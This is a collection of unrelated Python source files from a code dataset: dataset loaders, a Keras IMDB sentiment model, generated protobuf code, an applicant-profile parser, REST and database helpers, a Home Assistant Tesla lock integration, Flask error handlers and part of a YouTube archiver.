# [0, 0, 0, 1]], dtype=np.float32)
self.full_res_shape = [800,600]#
#400/ fx = tan 35 =0.7 --> fx =571.428
#800 * k[0] = 571.428 ->> k0 = 0.714
#600* k1 = 571.428, k1 =0.952
self.K = np.array([[0.714, 0, 0.5, 0],
[0, 0.952, 0.5, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]], dtype=np.float32)
self.img_ext='.png'
self.depth_ext = '.png'
self.MaxDis = 255
self.MinDis = 0
def check_depth(self):
line = self.filenames[0].split()
scene_name = line[0]
frame_index = int(line[1])
depth_filename =Path(self.data_path)/scene_name/"depth"/"{:07d}.png".format(int(frame_index))
return depth_filename.exists()
def get_color(self, folder, frame_index, side, do_flip):
path =self.__get_image_path__(folder, frame_index)
color = self.loader(path)
if do_flip:
color = color.transpose(pil.FLIP_LEFT_RIGHT)
return color
def get_image_path(self, folder, frame_index):
f_str = "{:04d}{}".format(frame_index, self.img_ext)
image_path = Path(self.data_path)/ folder/"color/{}".format(f_str)
return image_path
def get_depth(self, folder, frame_index, side, do_flip):
path = self.get_depth_path(folder, frame_index)
depth_gt = plt.imread(path)
depth_gt = skimage.transform.resize(depth_gt, self.full_res_shape[::-1], order=0, preserve_range=True, mode='constant')
if do_flip:
depth_gt = np.fliplr(depth_gt)
return depth_gt#[0~1]
def get_depth_path(self, folder, frame_index):
f_str = "{:04d}{}".format(frame_index, self.img_ext)
depth_path = Path(self.data_path) / folder / "depth/{}".format(f_str)
return depth_path
class MCDataset(MonoDataset):
def __init__(self,*args,**kwargs):
super(MCDataset,self).__init__(*args,**kwargs)
#self.full_res_shape = [1920,1080]#
#FOV = 35d
#960 = 1920/2
#960/fx = tan 35 =0.7-> fx = 1371
# 1920 * k[0] = 1371-> k0 = 0.714
# 1080 * k[1 ]= 1371 -> k1 = 1.27
#self.K=np.array([[0.714, 0, 0.5, 0],
# [0, 1.27, 0.5, 0],
# [0, 0, 1, 0],
# [0, 0, 0, 1]], dtype=np.float32)
self.full_res_shape = [800,600]#
#400/ fx = tan 35 =0.7 --> fx =571.428
#800 * k[0] = 571.428 ->> k0 = 0.714
#600* k1 = 571.428, k1 =0.952
self.K = np.array([[0.714, 0, 0.5, 0],
[0, 0.952, 0.5, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]], dtype=np.float32)
self.img_ext='.png'
self.depth_ext = '.png'
self.MaxDis = 255
self.MinDis = 0
def check_depth(self):
line = self.filenames[0].split()
scene_name = line[0]
frame_index = int(line[1])
depth_filename =Path(self.data_path)/scene_name/"depth"/"{:04d}.png".format(int(frame_index))
return depth_filename.exists()
def get_color(self, folder, frame_index, side, do_flip):
path =self.__get_image_path__(folder, frame_index)
color = self.loader(path)
if do_flip:
color = color.transpose(pil.FLIP_LEFT_RIGHT)
return color
def __get_image_path__(self, folder, frame_index):
f_str = "{:04d}{}".format(frame_index, self.img_ext)
image_path = Path(self.data_path)/ folder/"color/{}".format(f_str)
return image_path
def get_depth(self, folder, frame_index, side, do_flip):
path = self.__get_depth_path__(folder, frame_index)
depth_gt = plt.imread(path)
depth_gt = skimage.transform.resize(depth_gt, self.full_res_shape[::-1], order=0, preserve_range=True, mode='constant')
if do_flip:
depth_gt = np.fliplr(depth_gt)
return depth_gt#[0~1]
def __get_depth_path__(self, folder, frame_index):
f_str = "{:04d}{}".format(frame_index, self.img_ext)
depth_path = Path(self.data_path) / folder / "depth/{}".format(f_str)
return depth_path
|
py | 7dfff9d20f27bb9ed699f1ad1ade0595aa9d4fd8 | import tensorflow as tf
from tensorflow import keras
import numpy as np
data = keras.datasets.imdb
(train_data, train_labels), (test_data, test_labels) = data.load_data(num_words = 10000)
# Here num_words = 10,000 essentially means that we have a vocabulary of 10000 words only.
# This also shrinks our data which makes it a little bit nicer :)
word_index = data.get_word_index()
# This gives us tuples which contain the strings of the words corresponding to the integers.
word_index = {k:(v+4) for k, v in word_index.items()}
# This just breaks the tuple into key and value pairs.
word_index["<PAD>"] = 0
# Here padding is used to make each movie reivew of the same length.
word_index["<START>"] = 1
word_index["<UNK>"] = 2
# This is for the unknown characters that are not in the dictionary.
word_index["<UNUSED>"] = 3
word_index["<BREAK>"] = 4
reverse_word_index = dict([(key, value) for (value, key) in word_index.items()])
# This dictinary reverses the word_index, now the integers point to the word.
def decode_review(text):
return " ".join([reverse_word_index.get(i,"?") for i in text])
# This function decodes the review from integers to words that are present in the dictionary.
train_data = keras.preprocessing.sequence.pad_sequences(train_data, value = word_index["<PAD>"], padding = "post", maxlen = 270)
test_data = keras.preprocessing.sequence.pad_sequences(test_data, value = word_index["<PAD>"], padding = "post", maxlen = 270)
# This inbuilt keras function does the padding for train and test data.
# Model down here
model = keras.Sequential()
model.add(keras.layers.Embedding(10000,16))
model.add(keras.layers.GlobalAveragePooling1D())
model.add(keras.layers.Dense(16, activation = "relu"))
model.add(keras.layers.Dense(1, activation = "sigmoid"))
# The sigmoid activation layer is the output layer (hypothesis) of the neural network which consists of
# one neuron which gives out the prediction as 0 or 1.
# Moreover in this layer the sigmoid function manages the probablities and returns the desired output.
# Some Intuition behind the embedding layer...
# The Embedding layer tries to group the words that are similar to each other.
# Mathematically, the Embedding layer finds word vectors for each word that we pass it.
# A word vector can be any dimensional space.Now here we've picked 16 dimensions for each word vector.
# Initially, we create 10000 word vectors for every single word.
# When we call the embedding layer...it grabs all of those word vectors for whatever input we have
# and use that as the data that we pass on to the next layer.
# So it looks at the context the words have been used for and groups similar words together.
# The output of the embedding layer gives us a 16 dimension vector(16 coefficients).
# The GlobalAveragePooling1D() essentially just scales down the data (the dimensions) cuz we have tons
# of words and each word gives a 16 dimension output.
model.summary()
model.compile(optimizer = "adam", loss = "binary_crossentropy", metrics = ["accuracy"])
x_val = train_data[:10000]
x_train = train_data[10000:]
y_val = train_labels[:10000]
y_train = train_labels[10000:]
fitModel = model.fit(x_train, y_train, epochs = 40, batch_size = 500, validation_data = (x_val, y_val), verbose = 1)
results = model.evaluate(test_data, test_labels)
model.save("imdb_reviews_model.h5")
print(results)
test_review = test_data[15]
predict = model.predict([test_review])
print("Review for test_data")
print(decode_review(test_review))
print("Prediction"+ str(predict[15]))
print("Actual"+ str(test_labels[15]))
print(results)
|
py | 7dfffbceae3ed651bb5fc94c54fccc9b3fae6719 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: object_detection/protos/eval.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='object_detection/protos/eval.proto',
package='object_detection.protos',
syntax='proto2',
serialized_pb=_b('\n\"object_detection/protos/eval.proto\x12\x17object_detection.protos\"\xab\x05\n\nEvalConfig\x12\x1e\n\x12num_visualizations\x18\x01 \x01(\r:\x02\x31\x30\x12\x1a\n\x0cnum_examples\x18\x02 \x01(\r:\x04\x35\x30\x30\x30\x12\x1f\n\x12\x65val_interval_secs\x18\x03 \x01(\r:\x03\x33\x30\x30\x12\x14\n\tmax_evals\x18\x04 \x01(\r:\x01\x30\x12\x19\n\nsave_graph\x18\x05 \x01(\x08:\x05\x66\x61lse\x12\"\n\x18visualization_export_dir\x18\x06 \x01(\t:\x00\x12\x15\n\x0b\x65val_master\x18\x07 \x01(\t:\x00\x12\x13\n\x0bmetrics_set\x18\x08 \x03(\t\x12\x15\n\x0b\x65xport_path\x18\t \x01(\t:\x00\x12!\n\x12ignore_groundtruth\x18\n \x01(\x08:\x05\x66\x61lse\x12\"\n\x13use_moving_averages\x18\x0b \x01(\x08:\x05\x66\x61lse\x12\"\n\x13\x65val_instance_masks\x18\x0c \x01(\x08:\x05\x66\x61lse\x12 \n\x13min_score_threshold\x18\r \x01(\x02:\x03\x30.5\x12&\n\x1amax_num_boxes_to_visualize\x18\x0e \x01(\x05:\x02\x32\x30\x12\x1a\n\x0bskip_scores\x18\x0f \x01(\x08:\x05\x66\x61lse\x12\x1a\n\x0bskip_labels\x18\x10 \x01(\x08:\x05\x66\x61lse\x12*\n\x1bvisualize_groundtruth_boxes\x18\x11 \x01(\x08:\x05\x66\x61lse\x12\x32\n#groundtruth_box_visualization_color\x18\x12 \x01(\t:\x05\x62lack\x12\x35\n&keep_image_id_for_visualization_export\x18\x13 \x01(\x08:\x05\x66\x61lse\x12$\n\x16retain_original_images\x18\x17 \x01(\x08:\x04true')
)
_EVALCONFIG = _descriptor.Descriptor(
name='EvalConfig',
full_name='object_detection.protos.EvalConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='num_visualizations', full_name='object_detection.protos.EvalConfig.num_visualizations', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=True, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='num_examples', full_name='object_detection.protos.EvalConfig.num_examples', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=True, default_value=5000,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='eval_interval_secs', full_name='object_detection.protos.EvalConfig.eval_interval_secs', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=True, default_value=300,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_evals', full_name='object_detection.protos.EvalConfig.max_evals', index=3,
number=4, type=13, cpp_type=3, label=1,
has_default_value=True, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='save_graph', full_name='object_detection.protos.EvalConfig.save_graph', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='visualization_export_dir', full_name='object_detection.protos.EvalConfig.visualization_export_dir', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='eval_master', full_name='object_detection.protos.EvalConfig.eval_master', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='metrics_set', full_name='object_detection.protos.EvalConfig.metrics_set', index=7,
number=8, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='export_path', full_name='object_detection.protos.EvalConfig.export_path', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ignore_groundtruth', full_name='object_detection.protos.EvalConfig.ignore_groundtruth', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_moving_averages', full_name='object_detection.protos.EvalConfig.use_moving_averages', index=10,
number=11, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='eval_instance_masks', full_name='object_detection.protos.EvalConfig.eval_instance_masks', index=11,
number=12, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_score_threshold', full_name='object_detection.protos.EvalConfig.min_score_threshold', index=12,
number=13, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_num_boxes_to_visualize', full_name='object_detection.protos.EvalConfig.max_num_boxes_to_visualize', index=13,
number=14, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=20,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='skip_scores', full_name='object_detection.protos.EvalConfig.skip_scores', index=14,
number=15, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='skip_labels', full_name='object_detection.protos.EvalConfig.skip_labels', index=15,
number=16, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='visualize_groundtruth_boxes', full_name='object_detection.protos.EvalConfig.visualize_groundtruth_boxes', index=16,
number=17, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='groundtruth_box_visualization_color', full_name='object_detection.protos.EvalConfig.groundtruth_box_visualization_color', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("black").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='keep_image_id_for_visualization_export', full_name='object_detection.protos.EvalConfig.keep_image_id_for_visualization_export', index=18,
number=19, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='retain_original_images', full_name='object_detection.protos.EvalConfig.retain_original_images', index=19,
number=23, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=64,
serialized_end=747,
)
DESCRIPTOR.message_types_by_name['EvalConfig'] = _EVALCONFIG
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
EvalConfig = _reflection.GeneratedProtocolMessageType('EvalConfig', (_message.Message,), dict(
DESCRIPTOR = _EVALCONFIG,
__module__ = 'object_detection.protos.eval_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.EvalConfig)
))
_sym_db.RegisterMessage(EvalConfig)
# @@protoc_insertion_point(module_scope)
|
py | 7dfffcc61c49dcab2dd7e89d0b8dec3c202c05f1 | import re
import logging
#from gre2gmat.conversions import gre2gmat
class ApplicantProfile():
def __init__(self, list_of_stats_text, odds_string):
self.uni = None
self.gmat_score = None
self.gpa = None
self.odds = None
self.age = None
self.race = None
self.gender = None
self.major = None
self.job_title = None
self.international = None
self.odds = None
for stat in list_of_stats_text:
su = stat.upper()
# the length check is to make sure we dont get extraneeous comments tht have "GMAT" in them
if 'GMAT' in su and bool(re.search('\d', su)) and (self.gmat_score is None):
self.gmat_score = self.parse_gmat(su)
elif ('GPA' in su or 'GRADE POINT AVERAGE' in su) and (bool(re.search('\d', su)) and self.gpa is None):
self.gpa = self.parse_gpa(su)
elif ('UNIVERSITY' in su or 'COLLEGE' in su or 'DEGREE' in su or 'INSTITUTE' in su) and (self.uni is None):
self.uni = self.parse_uni(su)
self.major = self.parse_major(su)
elif ('YEAR' in su) and (bool(re.search('\d', su)) and self.age is None):
self.age = self.parse_age(su)
self.race = self.parse_race(su)
self.gender = self.parse_gender(su)
self.odds = odds_string
for t in [self.uni, self.gmat_score, self.gpa]:
logging.info(str(t))
logging.info(self.odds)
"""
represent one feature using this class. Why does this exist?
gpa_string: string of gpa
university_string: string of school they went to
gmat_string: a string because sometimes its represented as a __Q/__V other times as raw score
we will do some parsing depending on the format
job_title: defaults to None (financial analyst, engineer, software, teacher, consultant)
industry: which industry is the person in (finance, energy, marketing, automotive)
company: type of company, defaults to None (large well known, medium sized, start up, unicorn)
international: boolean. defaults to False -> U.S applicants
race: string representing race, may need parsing when we check out the raw text data
age: how old is the person featured
"""
def boss_setter(self, gpa_string, gmat_string, univeristy_string, odds_string, job_title=None, industry=None, company=None, international=False, race=None, age=None, gender=None, major=None):
# mandatory
self.gpa = self.parse_gpa(gpa_string)
self.gmat_score = self.parse_gmat(gmat_string)
self.uni = self.parse_uni(univeristy_string)
self.odds = odds_string
# optionals
self.job_title = job_title
self.industry = industry
self.company = company
self.international = international
self.race = race
self.age = age
self.gender = gender
self.major = major
def parse_major(self, major_str):
su = major_str.upper()
if 'ENGINEER' in su or 'COMPUTER' in su:
return 'Engineering'
elif 'ECON' in su:
return 'Economics'
elif 'FINANCE' in su or 'ACCOUNT' in su:
return 'Finance'
elif 'BUSINESS' in su:
return 'Business'
elif 'INTERNATIONAL' in su:
return 'International Studies'
elif 'EDUCATION' in su:
return 'Education'
elif 'PHILOSOPHY' in su:
return 'Philosophy'
elif 'POLITIC' in su and 'SCIENCE' in su:
return 'Political Science'
elif 'PUBLIC POLICY' in su:
return 'Public Policy'
elif 'JOURNAL' in su:
return 'Jouranlism'
elif 'SCIENCE' in su or 'BIOLOGY' in su or 'CHEMISTRY' in su or 'PHYSIC' in su or 'MATH' in su:
return 'STEM'
elif 'FROM' in su:
split_major = su.split('FROM')
if len(split_major) > 1:
self.uni = self.parse_uni(split_major[1])
else:
try:
logging.warning("Didn't parse any major from: {}\n".format(major_str))
except UnicodeEncodeError:
pass
# not politically correct , will fix later and see how data comes out
def parse_gender(self, gender_str):
su = gender_str.upper()
if 'FE' in su or 'WOMAN' in su:
return 'Female'
# this order matters, since male is in female and man is in woman
elif 'MALE' in su or 'MAN' in su:
return 'MALE'
else:
try:
logging.warning("Could not parse sex from {}\n".format(gender_str))
except UnicodeEncodeError:
pass
return None
# basic & non researched, potentially problematic.. working on it.
def parse_race(self, race_str):
s = race_str.upper()
if('AFRICA' in s or 'BLACK' in s or 'GHAN' in s or 'NIGERI' in s):
return 'Black'
elif 'ASIA' in s or 'INDIA' in s:
return 'Asian'
elif ('HISPANIC' in s) or ('LATIN' in s):
return 'Latinx'
elif ('WHITE' in s):
return 'White'
else:
try:
logging.warning("Didnt parse any race from: {}\n".format(race_str))
except UnicodeEncodeError:
pass
return None
def parse_age(self, age_str):
g = re.findall('[-+]?\d*\.\d+|\d+', age_str)
if len(g) > 0:
age = g[0]
if float(age) > 80 or float(age) < 18:
try:
logging.warning("Messed up age parsing: {}\n".format(age_str))
except UnicodeEncodeError:
pass
else:
return age
elif '-' in age_str and 'YEAR' in age_str.upper():
split_age = age_str.split('-')
age = split_age[0]
return age
try:
logging.warning("Could not age parse: {}\n".format(age_str))
except UnicodeEncodeError:
pass
return
# in progress lol, this is stupid.
def parse_uni(self, uni_str):
s = uni_str.upper()
# need to rework to have this be a list that allows you to update and add more entries
# this methodology is pretty bad. right now but ok for first pass.
if ('IVY' in s and not 'NEAR' in s) or ('M.I.T' in s) or ('COLUMBIA' in s) or ('YALE' in s) or ('STANFORD' in s) or ('HARVARD' in s):
return 'Tier 1'
elif 'NEAR' in s and 'IVY' in s:
return 'Tier 2'
else:
try:
logging.warning("Not enough info to parse university: {}".format(uni_str))
except UnicodeEncodeError:
pass
return 'Tier 3'
def parse_gpa(self, gpa_str):
# https://stackoverflow.com/questions/4703390/how-to-extract-a-floating-number-from-a-string
return re.findall('[-+]?\d*\.\d+|\d+', gpa_str)[0]
def parse_gmat(self, gmat_str):
s = gmat_str.upper()
if '/' in s:
v = 0
q = 0
if 'V' in s:
v = int(re.findall('\d+', s)[0])
if 'Q' in s:
q = int(re.findall('\d+', s)[0])
# try to convert a gre score to gmat (rough)
if(v != 0 and q != 0):
# using my pypi package! https://github.com/weAllWeGot/gre_to_gmat
rough_est = gre2gmat(gre_verbal=v, gre_quant=q)
rounded = rough_est
if rounded > 800:
return 800
else:
return rounded
else:
try:
logging.warning("Could not parse gmat: {}\n".format(gmat_str))
except UnicodeEncodeError:
pass
return None
elif 'GMAT' in s:
return int(re.findall('\d+', s)[0])
try:
logging.warning("Could not parse GMAT score from: {}\n".format(gmat_str))
except UnicodeEncodeError:
pass
return None
|
py | 7dfffd41bf75df367cc9de5af97fba9b4e8e8630 | '''
Copyright 2020 Flexera Software LLC
See LICENSE.TXT for full license text
SPDX-License-Identifier: MIT
Created on Nov 1, 2019
@author: SGeary
'''
import logging
import requests
import sys
import config
logger = logging.getLogger(__name__)
#######################################################################
# If the calling app is a flask app then we can use
# the flask abort function to catch exceptions
# so see if its defined in a common config file
try:
FLASKAPP = config.FLASKAPP
except:
FLASKAPP = False
if FLASKAPP:
from flask import abort
#######################################################################
FNCI_API = "FNCI License Lookup API"
ENDPOINT_URL = config.BASEURL + "license/lookup"
#-----------------------------------------------------------------------#
def lookup_license(licenseID, authToken):
logger.debug("Entering lookup_license with licenseID: %s" %(licenseID))
headers = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + authToken}
RESTAPI_URL = ENDPOINT_URL + "?licenseId=" + str(licenseID)
logger.debug(" RESTAPI_URL: %s" %RESTAPI_URL)
logger.debug(" headers: %s" %headers)
try:
response = requests.get(RESTAPI_URL, headers=headers)
response.raise_for_status()
except requests.exceptions.ConnectionError:
# Connection Error - Is the server up and running?
abort_message = FNCI_API + " - Error Connecting to FNCI Server - " + (ENDPOINT_URL).split("codeinsight")[0] # Get rid of everything after codeinsight in url
logger.error(" %s" %(abort_message))
if FLASKAPP:
# Using error code 500 (Internal Server Error) to cover connection errors
# in the flask apps
abort(500, FNCI_API + " - %s" %abort_message)
else:
print(abort_message)
print("Is the FNCI server running?")
print("Exiting script")
sys.exit()
except requests.exceptions.RequestException as e: # Catch the exception for the logs but process below
logger.error(e)
# We at least received a response from FNCI so check the status to see
# what happened if there was an error or the expected data
if response.status_code == 200:
logger.debug(" Call to %s was successful." %FNCI_API)
return response.json()["Content: "]
elif response.status_code == 400:
# Bad Request
logger.error(" %s - Error: %s - Bad Request." %(FNCI_API, response.status_code ))
if FLASKAPP:
abort(400, FNCI_API + " - Bad Request - Look at debug log for more details")
else:
print("%s - Error: %s - Bad Request." %(FNCI_API, response.status_code ))
print(" Exiting script")
sys.exit()
elif response.status_code == 401:
# Unauthorized Access
logger.error(" %s - Error: %s - Authentication Failed: JWT token is not valid or user does not have correct permissions." %(FNCI_API, response.status_code ))
if FLASKAPP:
abort(401, FNCI_API + " - Authentication Failed: JWT token is not valid or user does not have correct permissions.")
else:
print("%s - Error: %s - Authentication Failed: JWT token is not valid or user does not have correct permissions." %(FNCI_API, response.status_code ))
print(" Exiting script")
sys.exit()
elif response.status_code == 404:
# Not Found
logger.error(" %s - Error: %s - URL endpoint not found: %s" %(FNCI_API, response.status_code, RESTAPI_URL ))
if FLASKAPP:
abort(400, FNCI_API + " - Bad Request - URL endpoint not found")
else:
print(" %s - Error: %s - URL endpoint not found: %s" %(FNCI_API, response.status_code, RESTAPI_URL ))
print(" Exiting script")
sys.exit()
elif response.status_code == 405:
# Method Not Allowed
logger.error(" %s - Error: %s - Method (GET/POST/PUT//DELETE/ETC) Not Allowed." %(FNCI_API, response.status_code ))
if FLASKAPP:
abort(405, FNCI_API + " - Method Not Allowed.")
else:
print(" %s - Error: %s - Method (GET/POST/PUT//DELETE/ETC) Not Allowed." %(FNCI_API, response.status_code ))
print(" Exiting script")
sys.exit()
elif response.status_code == 500:
# Internal Server Error
logger.error(" %s - Error: %s - Internal Server Error." %(FNCI_API, response.status_code ))
if FLASKAPP:
abort(500, FNCI_API + " - Internal Server Error.")
else:
print(" %s - Error: %s - Internal Server Error." %(FNCI_API, response.status_code ))
print(" Exiting script")
sys.exit() |
py | 7dfffd8849fca7065873e1c443229cceae14bda7 | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from typing import Generator
from core.config import settings
SQLALCHEMY_DATABASE_URL = settings.DATABASE_URL
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
def get_db_session() -> Generator:
try:
session = SessionLocal()
yield session
finally:
session.close()
|
py | 7dfffeecd3f631d488033a95b3c5cbfc2bfe44d4 | import eveapi
from apps.apies.models import CallGroup, Call, Api
from apps.characters.models import RefType
api = eveapi.EVEAPIConnection()
data = api.API.CallList()
def call_groups():
for group in data.callGroups:
try:
CallGroup.objects.create(
groupid=group.groupID,
name=group.name,
description=group.description,
)
except:
print "You stupid"
def calls():
for call in data.calls:
if call.accessMask == 8388608:
#no need for limited character info. Or full acces or none
continue
try:
Call.objects.create(
accessmask=call.accessMask,
accounttype=call.type,
name=call.name,
callgroup=CallGroup.objects.get(groupid=call.groupID),
description=call.description,
)
except:
print "Some shit didnt work dude"
# extra = []
# for call in extra:
# Call.objects.create(
# accessmask=call.accessMask,
# accounttype=Api.CHARACTER,
# name=call.name,
# callgroup=CallGroup.objects.get(groupid=call.groupID),
# description=call.description,
# )
# Call.objects.create(
# accessmask=call.accessMask,
# accounttype=Api.CORPORATION,
# name=call.name,
# callgroup=CallGroup.objects.get(groupid=call.groupID),
# description=call.description,
# )
def reftypes():
for ref in api.eve.RefTypes().refTypes:
try:
RefType.objects.create(
reftypeid=ref.refTypeID,
reftypename=ref.refTypeName,
)
except:
"You fucked up mate"
call_groups()
calls()
reftypes()
|
py | 7dffff5a5e0c6c04d63f336e946ce181bddbf650 | """Support for Tesla door locks."""
import logging
from homeassistant.components.lock import LockDevice
from homeassistant.const import STATE_LOCKED, STATE_UNLOCKED
from . import DOMAIN as TESLA_DOMAIN, TeslaDevice
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Tesla binary_sensors by config_entry."""
entities = [
TeslaLock(
device,
hass.data[TESLA_DOMAIN][config_entry.entry_id]["controller"],
config_entry,
)
for device in hass.data[TESLA_DOMAIN][config_entry.entry_id]["devices"]["lock"]
]
async_add_entities(entities, True)
class TeslaLock(TeslaDevice, LockDevice):
"""Representation of a Tesla door lock."""
def __init__(self, tesla_device, controller, config_entry):
"""Initialise of the lock."""
self._state = None
super().__init__(tesla_device, controller, config_entry)
async def async_lock(self, **kwargs):
"""Send the lock command."""
_LOGGER.debug("Locking doors for: %s", self._name)
await self.tesla_device.lock()
async def async_unlock(self, **kwargs):
"""Send the unlock command."""
_LOGGER.debug("Unlocking doors for: %s", self._name)
await self.tesla_device.unlock()
@property
def is_locked(self):
"""Get whether the lock is in locked state."""
return self._state == STATE_LOCKED
async def async_update(self):
"""Update state of the lock."""
_LOGGER.debug("Updating state for: %s", self._name)
await super().async_update()
self._state = STATE_LOCKED if self.tesla_device.is_locked() else STATE_UNLOCKED
|
py | 7dffffa7dafbb2d753501132ee68ab7e9b8e0930 | from flask import render_template, request
from app import db
from app.errors import bp
from app.api.errors import error_response as api_error_response
def wants_json_response():
return request.accept_mimetypes['application/json'] >= request.accept_mimetypes['text/html']
@bp.app_errorhandler(404)
def not_found_error(error):
if wants_json_response():
return api_error_response(404)
return render_template('errors/404.html'), 404
@bp.app_errorhandler(500)
def internal_error(error):
db.session.rollback()
if wants_json_response():
return api_error_response(500)
return render_template('errors/500.html'), 500
|
py | b4000147f7a6bdfe3d2250cb6dade7c64702593c | class UserNotFound(Exception):
def __init__(self, *args: object) -> None:
super().__init__(*args)
|
py | b40001e028877df677647b1c0e9d9201598b9faa | import logging
from ytarchiver.api import YoutubeChannel, APIError
from ytarchiver.common import Context, Event
from ytarchiver.download import generate_livestream_filename, generate_video_filename, DownloadError, \
LivestreamInterrupted
from ytarchiver.sqlite import Sqlite3Storage
def lookup(context: Context, is_first_run: bool):
statistics = _Statistics(
is_first_run=is_first_run,
monitor_livestreams=context.config.monitor_livestreams
)
context.livestream_recorders.update(context)
context.video_recorders.update(context)
with context.storage.open(context.config) as storage:
try:
channels = context.api.find_channels(context.config.channels_list)
for channel in channels:
_fetch_channel_content(context, channel, storage, statistics, is_first_run)
storage.commit()
except APIError:
context.logger.exception('error while making API call')
except DownloadError:
context.logger.exception('error while downloading')
except LivestreamInterrupted as e:
context.logger.error('livestream "{}" finished unexpectedly'.format(e.livestream_title))
except Exception:
context.logger.exception('unknown error')
statistics.announce(context.logger)
_process_events(context, is_first_run)
def _fetch_channel_content(
context: Context,
channel: YoutubeChannel,
storage: Sqlite3Storage, statistics,
is_first_run: bool=False):
_check_for_livestreams(context, channel, statistics, storage)
_check_for_videos(context, channel, is_first_run, statistics, storage)
def _check_for_livestreams(context: Context, channel: YoutubeChannel, statistics: '_Statistics', storage: Sqlite3Storage):
if not context.config.monitor_livestreams:
return
livestream = context.api.fetch_channel_livestream(channel)
if livestream is not None:
if not context.livestream_recorders.is_recording_active(livestream.video_id):
context.logger.info('new livestream "{}"'.format(livestream.title))
livestream.filename = generate_livestream_filename(context.config.output_dir, livestream)
context.bus.add_event(Event(type=Event.LIVESTREAM_STARTED, content=livestream))
context.livestream_recorders.start_recording(context, livestream)
storage.add_livestream(livestream)
statistics.notify_active_livestream()
def _check_for_videos(context: Context,
channel: YoutubeChannel,
is_first_run: bool,
statistics: '_Statistics',
storage: Sqlite3Storage):
for video in context.api.find_channel_uploaded_videos(channel, find_all=is_first_run):
video_not_registered = not storage.video_exist(video.video_id) and \
not context.video_recorders.is_recording_active(video.video_id)
if video_not_registered:
